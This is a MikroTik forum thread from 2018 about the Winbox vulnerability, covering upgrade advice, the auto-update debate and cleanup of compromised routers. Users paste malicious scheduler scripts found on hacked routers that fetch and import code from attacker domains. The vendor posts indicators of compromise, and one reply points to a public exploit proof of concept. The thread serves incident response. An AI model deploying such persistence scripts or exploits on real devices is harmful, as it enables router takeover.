Community discussions

 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

URGENT security reminder

Tue Oct 09, 2018 9:48 am

As alredy reported multiple times, in April 2018 MikroTik fixed a vulnerability in the Winbox server component, which allowed an attacker to gain access to your RouterOS device, if the Winbox port was opened to untrusted networks. Most MikroTik devices include a default firewall that prevents this, but for different reasons, the firewall is sometimes turned off by the user.

The issue was already fixed, but a new method of exploitation has recently been revealed, so we urge all MikroTik users to upgrade their RouterOS versions.
Note: THIS IS THE SAME ISSUE THAT WAS ALREADY FIXED IN APRIL. Only a new way to use the same vulnerability was revealed now.

More details here: https://blog.mikrotik.com/security/new- ... ility.html
Please share this link with colleagues, employees, customers and other MikroTik users.
No answer to your question? How to write posts
 
anav
Forum Guru
Forum Guru
Posts: 2964
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: URGENT security reminder

Tue Oct 09, 2018 4:36 pm

Thanks for keeping us informed.
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
User avatar
Anumrak
Forum Guru
Forum Guru
Posts: 1008
Joined: Fri Jul 28, 2017 2:53 pm

Re: URGENT security reminder

Tue Oct 09, 2018 5:06 pm

Poor lazy bums.
 
Paul9cf22ad1
just joined
Posts: 23
Joined: Sun Mar 12, 2017 11:40 pm
Location: Seattle, WA

Re: URGENT security reminder

Tue Oct 09, 2018 6:22 pm

Auto update should be the default setting. Those who want to control updates will turn it off, noobs won't and will be protected.
 
FiREWiRE
just joined
Posts: 3
Joined: Tue Mar 01, 2011 2:11 am

Re: URGENT security reminder

Tue Oct 09, 2018 6:46 pm

I've updated my RB750G yesterday from 6.42.7 to 6.43.2 and after the update it was stuck at boot (posted about it here viewtopic.php?f=21&t=139353&start=150#p691241). What would a noob using auto update do in this case? He wouldn't even know why his router stopped working. Auto updates are a bad idea if they are not thoroughly tested (one of the reasons I don't use Windows 10).
 
User avatar
CassioCassimiro
just joined
Posts: 3
Joined: Wed Oct 10, 2018 12:09 am

Re: URGENT security reminder

Wed Oct 10, 2018 12:14 am

As for who does not have the user and password of the Routerboard Expecific, is there the possibility of access in root mode and exploit this vulnerability?
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Wed Oct 10, 2018 9:53 am

As for who does not have the user and password of the Routerboard Expecific, is there the possibility of access in root mode and exploit this vulnerability?
Your firewall should not allow people to access your router.
If you have updated RouterOS, nobody can exploit this vulnerability.
No answer to your question? How to write posts
 
User avatar
CassioCassimiro
just joined
Posts: 3
Joined: Wed Oct 10, 2018 12:09 am

Re: URGENT security reminder

Wed Oct 10, 2018 3:14 pm

As for who does not have the user and password of the Routerboard Expecific, is there the possibility of access in root mode and exploit this vulnerability?
Your firewall should not allow people to access your router.
If you have updated RouterOS, nobody can exploit this vulnerability.
Okay, so only people that have username and password can exploit the vulnerability? Or all people can access with vulnerability root even if you have not username and password for the routerboard?
About the answer "If you have updated RouterOS, nobody can exploit this vulnerability.":
What is the versions that don't have this vulnerability?
From which version does not show vulnerability, from 6.40.8 or 6.40.9 or 6.42.0?
We have several RouterBoard in 6.40.8 and we want to know if there is an urgency in updating them
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Wed Oct 10, 2018 3:17 pm

Cassio, please read the blog entry that was linked in first post. It answers all your questions and more;
https://blog.mikrotik.com/security/winb ... ility.html
No answer to your question? How to write posts
 
jerdtex
just joined
Posts: 3
Joined: Sun Jul 08, 2018 9:20 pm

Re: URGENT security reminder

Wed Oct 10, 2018 3:25 pm

As alredy reported multiple times, in April 2018 MikroTik fixed a vulnerability in the Winbox server component, which allowed an attacker to gain access to your RouterOS device, if the Winbox port was opened to untrusted networks. Most MikroTik devices include a default firewall that prevents this, but for different reasons, the firewall is sometimes turned off by the user.

The issue was already fixed, but a new method of exploitation has recently been revealed, so we urge all MikroTik users to upgrade their RouterOS versions.
Note: THIS IS THE SAME ISSUE THAT WAS ALREADY FIXED IN APRIL. Only a new way to use the same vulnerability was revealed now.

More details here: https://blog.mikrotik.com/security/new- ... ility.html
Please share this link with colleagues, employees, customers and other MikroTik users.
Thanks, I was hoping for such an update
 
User avatar
CassioCassimiro
just joined
Posts: 3
Joined: Wed Oct 10, 2018 12:09 am

Re: URGENT security reminder

Wed Oct 10, 2018 3:51 pm

Cassio, please read the blog entry that was linked in first post. It answers all your questions and more;
https://blog.mikrotik.com/security/winb ... ility.html
Thank's!
 
ArchilMindiashvili
just joined
Posts: 11
Joined: Thu Oct 11, 2018 3:48 pm

Re: URGENT security reminder

Thu Oct 11, 2018 4:16 pm

hi if i have opend winbox service but i have changed port for it, is it dangerous? ofcouse i`ll update os as soon as it will be posible, but it`s interesting if changed port is dangerous
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Thu Oct 11, 2018 4:22 pm

If the attacker scans your ports, he will find the new port number too. Upgrade anyway!
No answer to your question? How to write posts
 
User avatar
BartoszP
Forum Guru
Forum Guru
Posts: 1715
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: URGENT security reminder

Thu Oct 11, 2018 4:25 pm

This change makes router more secure as it is not possible to connect to WinBox service with standard port.
Real admins use real keyboards.
 
anav
Forum Guru
Forum Guru
Posts: 2964
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: URGENT security reminder

Thu Oct 11, 2018 4:34 pm

Always think of security as the first step before plugging cable into the wall and use the concept defense in layers.
Assume somewhere along the line a user will make an error and bad guys will be on the inside of your network as well.
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 1302
Joined: Sat Dec 24, 2016 11:17 am
Location: jo.overland at gmail.com

Re: URGENT security reminder

Thu Oct 11, 2018 5:27 pm

If you need remote WinBox, use VPN.
If that is not an option, use port knocking.
 
How to use Splunk to monitor your MikroTik Router

MikroTik->Splunk
 
 
philamonster
just joined
Posts: 13
Joined: Mon Apr 03, 2017 4:08 am

Re: URGENT security reminder

Fri Oct 12, 2018 1:41 pm

https://twitter.com/bad_packets/status/ ... 1824595968

Was ~275K a few days ago. A forum post is nice but do you have a mail campaign to warn customers of these vulns? I seem to only get emails regarding conferences/training sessions and seldom get emails for software upgrades and the like. August 5th was last advisory I received (filters not the issue) related to this.
 
User avatar
BartoszP
Forum Guru
Forum Guru
Posts: 1715
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: URGENT security reminder

Fri Oct 12, 2018 6:01 pm

It was already discussed. Who do call customers? End users or admins?

End users? ... most of them do not even know that they have Mikrotik device installed as gateway to Internet. Forget them.
Admins? ... real admins reading Mikrotik's site or forum should be/are aware of these problems but the main question is: Do they not want to "loose" time to upgrade their devices?
No e-mail campaign change this situation.
Real admins use real keyboards.
 
induktor
just joined
Posts: 8
Joined: Mon Dec 19, 2011 8:21 pm
Location: argentina

Re: URGENT security reminder

Fri Oct 12, 2018 9:42 pm

I try to update as many routers as i possible can, but lots of them are out of my reach, and some are mission critical, i can't risk to do a remote update on this ones, if something goes wrong, i'll be in trouble

I updated about 150 so far, still have around 200 to go, so it is a slow process, so far none of them bricked, or do some weird thing, except one RB951UI-2hnd that after the upgrade, disconnects my winbox client every 2 minutes, not something terrible.

anyway all of my routers have port knocking, and weird port numbers, so far none of them where infected afaik.

I don't agree with "automatic update" we already have too many problems with windows 10 (like the last update that erased a lot of data?) we don't want that with mikrotik, i need to trust my rigs, I know I trust mikrotik as it is now.
 
schadom
Member Candidate
Member Candidate
Posts: 139
Joined: Sun Jun 25, 2017 2:47 am
Location: Austria

Re: URGENT security reminder

Fri Oct 12, 2018 9:45 pm

Top story at HN at the moment: Some Russian guy claims he secured 100k MT devices which were vulnerable and openly accessible via the internet. He added some firewall rules and left an informational message for the device owners, some of which recently reported here in the forums that their router apparently got hacked.

https://news.ycombinator.com/item?id=18201499
https://www.zdnet.com/article/a-mysteri ... k-routers/
 
xphat
just joined
Posts: 24
Joined: Wed Feb 11, 2009 2:34 am

Re: URGENT security reminder

Sat Oct 13, 2018 12:58 am

Normally, Im someone who updates all my Mikrotik devices religiously.

However theres always that one router that you forget to upgrade. I manage hundreds of these things, many of them connected to public IP Addresses.

Saw that one of them got pwned today (I disabled the entries below), Also found web proxy enabled as well as dns server entries added and a whole bunch of very interesting things:

Apparently it got hacked a few days ago...

/system scheduler
add disabled=yes name=upd112 on-event="/system scheduler remove [find name=sh113\
]\r\
\n:do {/file remove u113.rsc} on-error={}" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
startup
add disabled=yes interval=6h name=upd113 on-event=":do {/tool fetch url=\"http:/\
/min01.com:31416/min01\?key=9nzFQxyZ8p2f55&part=8\" mode=http dst-path=u113.\
rsc} on-error={}\r\
\n:do {/tool fetch url=\"http://mikr0tik.com:31416/mikr0tik\?key=9nzFQxyZ8p2\
f55&part=8\" mode=http dst-path=u113.rsc} on-error={}\r\
\n:do {/tool fetch url=\"http://up0.bit:31416/up0\?key=9nzFQxyZ8p2f55&part=8\
\" mode=http dst-path=u113.rsc} on-error={}\r\
\n:do {/import u113.rsc} on-error={}\r\
\n:do {/file remove u113.rsc} on-error={}" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
oct/05/2018 start-time=19:34:41
add disabled=yes interval=12h name=upd114 on-event=":do {/tool fetch url=http://\
iplogger.co/1DHrN6 mode=http keep-result=no} on-error={}" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
oct/05/2018 start-time=19:34:41
 
maxmayer
just joined
Posts: 3
Joined: Sat Oct 13, 2018 12:23 pm
Location: ukraine

Re: URGENT security reminder

Sat Oct 13, 2018 12:32 pm

update it in any case
 
FranchBG
just joined
Posts: 1
Joined: Sat Oct 13, 2018 3:54 pm

Re: URGENT security reminder

Sat Oct 13, 2018 3:55 pm

Update for sure!!!
 
mdragons
just joined
Posts: 2
Joined: Sat Oct 13, 2018 4:25 pm

Re: URGENT security reminder

Sat Oct 13, 2018 4:29 pm

I don't agree with "automatic update" we already have too many problems with windows 10 (like the last update that erased a lot of data?) we don't want that with mikrotik, i need to trust my rigs, I know I trust mikrotik as it is now.
We should have automatic security updates. Security updates are different than feature upgrades and for mission critical devices such as routers, security updates should be included.
 
schadom
Member Candidate
Member Candidate
Posts: 139
Joined: Sun Jun 25, 2017 2:47 am
Location: Austria

Re: URGENT security reminder

Sat Oct 13, 2018 5:09 pm

I don't agree with "automatic update" we already have too many problems with windows 10 (like the last update that erased a lot of data?) we don't want that with mikrotik, i need to trust my rigs, I know I trust mikrotik as it is now.
We should have automatic security updates. Security updates are different than feature upgrades and for mission critical devices such as routers, security updates should be included.
Automatic security upgrades can ONLY be implemented, if they can be disabled. Opt-out MUST be possible.
 
Sob
Forum Guru
Forum Guru
Posts: 4619
Joined: Mon Apr 20, 2009 9:11 pm

Re: URGENT security reminder

Sat Oct 13, 2018 6:19 pm

But officially supported automatic updates would need bigger changes, current release channels are not perfect for this. The "stable" (previously "current") is out, because it breaks things every now and then. When it happens to few early adopters, it's not good, but imagine thousands routers all over the world breaking up, it would be some bad publicity. The "long term" (previously "bugfix") is better, but not completely safe either. Upgrades from a.b.C to a.b.D should be ok, but a.B.x to a.C.x bring bigger changes and something can go wrong (e.g. current bridge/switch changes don't seem to work for all people).

To make it as safe as possible, there would have to be some "microupdates" with only minimal changes, strictly security-only. But MikroTik can hardly provide them for every version they release.
People who quote full posts should be spanked with ethernet cable. Some exceptions for multi-topic threads may apply.
 
usmany
Member Candidate
Member Candidate
Posts: 141
Joined: Sun Dec 20, 2009 3:20 pm
Location: Nigeria
Contact:

Re: URGENT security reminder

Mon Oct 15, 2018 4:28 pm

If the attacker scans your ports, he will find the new port number too. Upgrade anyway!
Hi All,

I updated my Router OS from v6.41. to v643.2, updated winbox to current version, updated admin password, still the hacker was able to get full control of the system locking me out.

What's the way out again?

Thank you
When the world turn back on you, you turn your back on the world...
 
mkx
Forum Guru
Forum Guru
Posts: 2910
Joined: Thu Mar 03, 2016 10:23 pm

Re: URGENT security reminder

Mon Oct 15, 2018 5:31 pm

If the attacker scans your ports, he will find the new port number too. Upgrade anyway!
Hi All,

I updated my Router OS from v6.41. to v643.2, updated winbox to current version, updated admin password, still the hacker was able to get full control of the system locking me out.

What's the way out again?
It is highly probable that attacker installed some stealth script which allows her to regain control. The only way out is to netinstall router (during that process router's NAND storage is formatted) and then configure router from scratch. It is vital not to use backup to restore configuration, text export can be handy when configuring ... but be careful not to copy any configuration bit for which you're not sure why it's there.
BR,
Metod
 
usmany
Member Candidate
Member Candidate
Posts: 141
Joined: Sun Dec 20, 2009 3:20 pm
Location: Nigeria
Contact:

Re: URGENT security reminder

Mon Oct 15, 2018 5:38 pm

If the attacker scans your ports, he will find the new port number too. Upgrade anyway!
Hi All,

I updated my Router OS from v6.41. to v643.2, updated winbox to current version, updated admin password, still the hacker was able to get full control of the system locking me out.

What's the way out again?
It is highly probable that attacker installed some stealth script which allows her to regain control. The only way out is to netinstall router (during that process router's NAND storage is formatted) and then configure router from scratch. It is vital not to use backup to restore configuration, text export can be handy when configuring ... but be careful not to copy any configuration bit for which you're not sure why it's there.
Ok! that is cool. I have a backup copy of /export file, I will reload script from scratch for security measure.

Thank
When the world turn back on you, you turn your back on the world...
 
mkx
Forum Guru
Forum Guru
Posts: 2910
Joined: Thu Mar 03, 2016 10:23 pm

Re: URGENT security reminder

Mon Oct 15, 2018 5:49 pm

Ok! that is cool. I have a backup copy of /export file, I will reload script from scratch for security measure.
Before loading exported configuration do inspect it in case it contains something suspicious.
BR,
Metod
 
usmany
Member Candidate
Member Candidate
Posts: 141
Joined: Sun Dec 20, 2009 3:20 pm
Location: Nigeria
Contact:

Re: URGENT security reminder

Mon Oct 15, 2018 6:14 pm

Ok! that is cool. I have a backup copy of /export file, I will reload script from scratch for security measure.
Before loading exported configuration do inspect it in case it contains something suspicious.
Sure! i will check it well.

Thanks
When the world turn back on you, you turn your back on the world...
 
usmany
Member Candidate
Member Candidate
Posts: 141
Joined: Sun Dec 20, 2009 3:20 pm
Location: Nigeria
Contact:

WinBox Security

Tue Oct 16, 2018 5:33 pm

Hi All,

I have question regards winbox connection mode; is it highly secure or not at all? ssh or telnet connection?

if we say winbox connection is ssh, why i see this in my box, see attached file
You do not have the required permissions to view the files attached to this post.
When the world turn back on you, you turn your back on the world...
 
User avatar
pcunite
Forum Veteran
Forum Veteran
Posts: 945
Joined: Sat May 25, 2013 5:13 am
Location: USA

Re: WinBox Security

Tue Oct 16, 2018 5:37 pm

I have question regards winbox connection mode; is it highly secure or not at all? ssh or telnet connection?
if we say winbox connection is ssh, why i see this in my logs

After you've connected with Winbox, and then click on "New Terminal", you'll see user logged in via telnet messages.
 
usmany
Member Candidate
Member Candidate
Posts: 141
Joined: Sun Dec 20, 2009 3:20 pm
Location: Nigeria
Contact:

Re: WinBox Security

Tue Oct 16, 2018 9:29 pm

I have question regards winbox connection mode; is it highly secure or not at all? ssh or telnet connection?
if we say winbox connection is ssh, why i see this in my logs

After you've connected with Winbox, and then click on "New Terminal", you'll see user logged in via telnet messages.
yes, i saw it. what does that mean? ssh or telnet connection via winbox?
When the world turn back on you, you turn your back on the world...
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Wed Oct 17, 2018 10:11 am

Yes, this is what it means
No answer to your question? How to write posts
 
Smithpoh
just joined
Posts: 1
Joined: Wed Oct 17, 2018 7:01 pm

Re: URGENT security reminder

Thu Oct 18, 2018 7:16 am

Cassio, please read the blog entry that was linked in first post. It answers all your questions and more;
https://blog.mikrotik.com/security/winb ... ility.html
Thanks for the link.
 
mauro1108
just joined
Posts: 3
Joined: Fri Jan 30, 2015 12:57 pm

Re: URGENT security reminder

Fri Oct 19, 2018 11:07 am

hi, we have hundreds of mikrotik cpe with public static ip; fortunately, only a few of them (5) have a ros version afflicted by the vulnerability; they came from the factory with ros 6.40.3 , and a few hours from installation, someone use the vulnerability to change the password and lock us out. In our configuration, we also have a scheduled script that grabs the configuration from one of our servers once a day, but they disable it too...; so my question is, are there any way to bring back the control of these cpes remotely, or the only way to do it is locally with netinstall?
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Fri Oct 19, 2018 11:10 am

hi, we have hundreds of mikrotik cpe with public static ip; fortunately, only a few of them (5) have a ros version afflicted by the vulnerability; they came from the factory with ros 6.40.3 , and a few hours from installation, someone use the vulnerability to change the password and lock us out. In our configuration, we also have a scheduled script that grabs the configuration from one of our servers once a day, but they disable it too...; so my question is, are there any way to bring back the control of these cpes remotely, or the only way to do it is locally with netinstall?
if your user account has been disabled, then Netinstall is the only option.
however, most popular attacks leave the user account open, so try to log in from the local network side.
No answer to your question? How to write posts
 
mauro1108
just joined
Posts: 3
Joined: Fri Jan 30, 2015 12:57 pm

Re: URGENT security reminder

Fri Oct 19, 2018 12:57 pm

probably they changed the admin password, or they disabled the "admin" user.....; i receive a "invalid username or password" during login attempts...;
 
User avatar
vecernik87
Long time Member
Long time Member
Posts: 642
Joined: Fri Nov 10, 2017 8:19 am

Re: URGENT security reminder

Fri Oct 19, 2018 1:04 pm

If it is old RouterOS and you get "bad password" it means you have access to vulnerable winbox service.
All you need to do is try the Proof of Concept: https://github.com/BasuCert/WinboxPoC It is really simple to use, all you need is python3 installed and IP/MAC of the device.
Someone hacked your device? Hack it back for yourself! :D
 
mauro1108
just joined
Posts: 3
Joined: Fri Jan 30, 2015 12:57 pm

Re: URGENT security reminder

Fri Oct 19, 2018 7:24 pm

If it is old RouterOS and you get "bad password" it means you have access to vulnerable winbox service.
All you need to do is try the Proof of Concept: https://github.com/BasuCert/WinboxPoC It is really simple to use, all you need is python3 installed and IP/MAC of the device.
Someone hacked your device? Hack it back for yourself! :D

the Ros version is 6.40.3; i was able to run the Proof of Concept successfully, but the obtained credentials still not work.... :-/


EDIT: it works! the have limited the login of the users only to certain ip, but mac telnet is my friend :-) thanks a lot!!!
 
Max2
just joined
Posts: 2
Joined: Fri Dec 05, 2014 5:57 pm

Re: URGENT security reminder

Sat Oct 20, 2018 8:40 pm

I've been exposed to this vulnerability until last week. I had the impression that I had the WinBox port closed for WAN. The ISP's CGNAT rollout without any notification mislead me into thinking that my ports were closed when being scanned from the internet.

I've updated the software, but I'm a bit paranoia. How can I make sure that the router's software/firmware/etc hasn't been tampered in any way while I was vulnerable, and that there's backdoor still left opened?
 
orangetek
newbie
Posts: 44
Joined: Wed Aug 14, 2013 5:19 pm

Re: URGENT security reminder

Tue Oct 23, 2018 8:07 am

I have had a lot of devices hacked due to bad or no firewall configuration on those devices. The hostname is changed to "test". Upon inspection, a script is added and run via the scheduler every 2 hours. Here is the script
add name=ip owner=admin policy=\
    reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
    url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=5bc24d5c0d21bf27&actio\
    n=upload&sncode=EBD7A5565C5BA8CA22063E65F05533F2&dynamic=static\")  keep-res\
    ult=no}"
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Tue Oct 23, 2018 8:14 am

Max2, orangetek and others.

Do the "/export" command and carefully inspect all the settings for anything you don't recognize. Scripts, Scheduler entries, unknown IP addresses (in DNS menu, for example). The attackers sometimes change the input firewall rules too.

The nice article by Avast also has some tips:

If you manage to connect, the first thing to do is to close access to an external interface.
Look to see if you have any scripts, files, usernames, PPP secrets or scheduled jobs from the IOCs at the end of this article; if so, delete them. Start with scheduler as these tasks could be re-run, leading to re-configuration of the router again.
Disable web proxy, and SOCKS (if you don’t need them, or check their configuration otherwise), and check the firewall rules.
In the tools menu, check the packet sniffer.
If you don’t use PPTP server functionality, turn if off.
Check all user accounts, remove all suspicious ones, and set a strong password for the rest of them.

Now UPDATE THE FIRMWARE of the router to the latest version.
No answer to your question? How to write posts
 
orangetek
newbie
Posts: 44
Joined: Wed Aug 14, 2013 5:19 pm

Re: URGENT security reminder

Tue Oct 23, 2018 8:27 am

Thanks normis. Another script found.
:do {/tool fetch url="http://meaghan.pythonanywhere.com/" dst-path=tmp} on-error={:put "get http error"};
/import tmp;
/file remove tmp;
i am using these urls to detect infected devices
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Tue Oct 23, 2018 8:34 am

Here is also some stuff to look out for:
domains:

gazanew.com
mining711.com
srcip.com
src-ips.com
srcips.com
hostingcloud.science
meaghan.pythonanywhere.com
scheduled jobs names:

DDNS
CrtDDNS
UpDDNS
Setschedule[1-9]_
upd[113-116]
system[111-114]
ip
a
u[3-6]
User accounts known to be connected with campaigns:

toto
dodo
files on router:

i113.rsc
i114.rsc
I116.rsc
exsvc.rsc
No answer to your question? How to write posts
 
orangetek
newbie
Posts: 44
Joined: Wed Aug 14, 2013 5:19 pm

Re: URGENT security reminder

Tue Oct 23, 2018 8:49 am

Normis, is it enough to remove the scripts or is something injected and running on the routers that require a netinstall?
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Tue Oct 23, 2018 8:50 am

Not highly likely, but technically possible, although have not seen an example "in the wild". There are published methods how to do that, but from what you posted, those are the "regular" hacks.

Netinstall is always the safest choice, but 90% chance that deleting all this stuff + upgrade + new password will resolve your current issue.
No answer to your question? How to write posts
 
orangetek
newbie
Posts: 44
Joined: Wed Aug 14, 2013 5:19 pm

Re: URGENT security reminder

Tue Oct 23, 2018 8:54 am

Ok. Thanks for the info, we are currently seeing over 150 devices running these scripts. i am making a script to mass login and delete.

For anyone facing these issues, block access to service port inbound on your main gateway first.
 
orangetek
newbie
Posts: 44
Joined: Wed Aug 14, 2013 5:19 pm

Re: URGENT security reminder

Tue Oct 23, 2018 9:02 am

Does anyone know what this script is downloading and what it is doing?

*EDIT*

The first script returns a 2 byte string "no"
Last edited by orangetek on Tue Oct 23, 2018 9:06 am, edited 1 time in total.
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Tue Oct 23, 2018 9:05 am

Seems that it is no longer functional, as I tried it, and did not see anything similar to a script. I think the domains have expired or have been seized.
Read this article here about more details on all this issue:

https://blog.avast.com/mikrotik-routers ... aign-avast
No answer to your question? How to write posts
 
gnuttisch
Member
Member
Posts: 309
Joined: Fri Sep 10, 2010 3:49 pm

Re: URGENT security reminder

Sun Oct 28, 2018 8:16 pm

So, I got some routers that are "hacked" and has some stuff on them.
I try to clean them and then upgrade, but I cant, the upgrades wont get true. Is the only option to netinstall them?

Regards
 
User avatar
BartoszP
Forum Guru
Forum Guru
Posts: 1715
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: URGENT security reminder

Sun Oct 28, 2018 8:19 pm

Why to waste time? Netinstall and import configuration via script if you have one.
Real admins use real keyboards.
 
gnuttisch
Member
Member
Posts: 309
Joined: Fri Sep 10, 2010 3:49 pm

Re: URGENT security reminder

Sun Oct 28, 2018 8:35 pm

Cause I have routers all over the country, that's why I'am asking and cant be the only one who has that.
 
maxmayer
just joined
Posts: 3
Joined: Sat Oct 13, 2018 12:23 pm
Location: ukraine

Re: URGENT security reminder

Fri Nov 02, 2018 12:59 pm

i ll try to fix it, and if your advise will help i would be happy
 
martinees
just joined
Posts: 2
Joined: Thu Nov 08, 2018 9:49 pm

Re: URGENT security reminder

Thu Nov 08, 2018 10:38 pm

Hello guys, is there any chance to get into hacked device and dump actual configuration?

I regret to tell you that that one of my RB3011 has been hacked this week even though it has ROS 6.43.4 on it and recommended security measures was applied (winbox access is restricted only from LAN).

Unfortunately the thing is that I only performed upgrade each time, because I simply didn't see any evidence of changed configuration in the exported script from older ROS version.
Therefore, it would be pretty interesting for all of us, what is behind the "scenes".
Currently Winbox login does not work, nor ssh.

Any thoughts?
Thank you for your help.
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Fri Nov 09, 2018 8:48 am

What makes you so sure it is hacked, if you say only LAN was open and upgrade had been done?
If you don't have ANY access to it, maybe it's just "dead" (broken)?
No answer to your question? How to write posts
 
martinees
just joined
Posts: 2
Joined: Thu Nov 08, 2018 9:49 pm

Re: URGENT security reminder

Fri Nov 09, 2018 12:48 pm

Well, this suspected branch office router was still connected via SSTP tunel to the "main" router, therefore I had still full access to the remote site via SSTP tunel. I just couldn't login into the router. Only what I got is typical wrong username/password message. So I had to turn it off and use only backup link.
Moreover, I saw in the statistics provided by my ISP, the outgoing traffic was ranging at 80% of uplink speed constantly in last few days. Which is not typical expected traffic shape from that branch office.
I am still wondering how this could happened.
Thank you for help.
 
User avatar
sebastia
Forum Guru
Forum Guru
Posts: 1776
Joined: Tue Oct 12, 2010 3:23 am
Location: Antwerp, BE

Re: URGENT security reminder

Fri Nov 16, 2018 11:16 pm

Hey martinees, did you had a backup partition on that router? If you do, switch to it and override the primary?
 
eduardo84
just joined
Posts: 2
Joined: Fri Nov 16, 2018 7:45 pm
Location: habana
Contact:

Re: URGENT security reminder

Fri Nov 16, 2018 11:30 pm

Seems that it is no longer functional, as I tried it, and did not see anything similar to a script. I think the domains have expired or have been seized.
Read this article here about more details on all this issue:

https://blog.avast.com/mikrotik-routers ... aign-avast
hello I do not abloi well English, I want to know who can help me connect my sxt lite 5 station mode to an ap that a pirate clone the mac, I had it resolved by connect list, but the pirate cloned the mac and I can not connect ,please help
 
tomasstatkus1
just joined
Posts: 2
Joined: Fri Nov 30, 2018 10:58 am

Re: URGENT security reminder

Fri Nov 30, 2018 11:04 am

Hi, Just want to be sure is that the same case of security issue or this is new?
 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 5931
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: URGENT security reminder

Fri Nov 30, 2018 12:30 pm

Same old
 
sindy
Forum Guru
Forum Guru
Posts: 3809
Joined: Mon Dec 04, 2017 9:19 pm

Re: URGENT security reminder

Sun Dec 02, 2018 1:52 pm

I am still wondering how this could happened.
Credentials leaked in the past using some older, now closed, vulnerability could have been used to access the device if remote access to a management service (winbox, ssh, https) was still possible from outside (via the WAN interface).

If no management access was permitted from outside but it was from inside, a malware running on one of the LAN devices may have used the previously leaked credentials to connect from there, or may have made use of some vulnerability not publicly known yet.

If the bad guys have found a way to let their software survive an upgrade, they may have used that instead of just preventing the upgrade from happening as was reported several times recently (in these cases, when you've uploaded the .npk file, it disappeared so it wasn't used after reboot).

So the only solution is netinstall, but even then, leaving management access open for anything in the LAN may not be safe.
Instead of writing novels, post /export hide-sensitive. Use find&replace in your favourite text editor to systematically replace all occurrences of each public IP address potentially identifying you by a distinctive pattern such as my.public.ip.1.
 
User avatar
vecernik87
Long time Member
Long time Member
Posts: 642
Joined: Fri Nov 10, 2017 8:19 am

Re: URGENT security reminder

Tue Dec 04, 2018 3:18 am

... noobs won't and will be secured.
Noobs will scream when their router randomly restart (because it was just applying updates during their gameplay)
Noobs will sue mikrotik when the router breaks some config during update as they will wake up one day and device won't work...

Right now, people are responsible for setting and updating their routers. If router gets hacked, it is usually user's fault as some management interface was accessible from internet. Even vulnerable version wouldn't be hacked, if routers were properly set up.
Therefore, Automatic updates will not really help because properly setup router is not vulnerable. In addition, automatic updates will put responsibility on Mikrotik's shoulders. Any issue with upgrade will hit many people who will have no idea how to fix it.

Personally, I don't think it is worth it. (it might be, if all updates were without single issue, but it is getting more common lately, that upgrade brings some issues which needs to be addressed by person)
 
User avatar
Chupaka
Forum Guru
Forum Guru
Posts: 8308
Joined: Mon Jun 19, 2006 11:15 pm
Location: Minsk, Belarus
Contact:

Re: URGENT security reminder

Tue Dec 04, 2018 5:59 pm

Noobs will scream when their router randomly restart (because it was just applying updates during their gameplay)
Tools -> Traffic Monitor :) "If there's no traffic for the last 5 minutes - it's okay to upgrade" xD
Russian-speaking forum: https://forum.mikrotik.by/. Welcome!

For every complex problem, there is a solution that is simple, neat, and wrong.

MikroTik. Your life. Your routing.
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 24186
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: URGENT security reminder

Wed Dec 05, 2018 1:26 pm

= never :D
No answer to your question? How to write posts
 
User avatar
Chupaka
Forum Guru
Forum Guru
Posts: 8308
Joined: Mon Jun 19, 2006 11:15 pm
Location: Minsk, Belarus
Contact:

Re: URGENT security reminder

Wed Dec 05, 2018 4:47 pm

= never :D
But they will stop complaining about the feature missing! xD
Russian-speaking forum: https://forum.mikrotik.by/. Welcome!

For every complex problem, there is a solution that is simple, neat, and wrong.

MikroTik. Your life. Your routing.
 
User avatar
Deantwo
Member Candidate
Member Candidate
Posts: 294
Joined: Tue Sep 30, 2014 4:07 pm

Re: URGENT security reminder

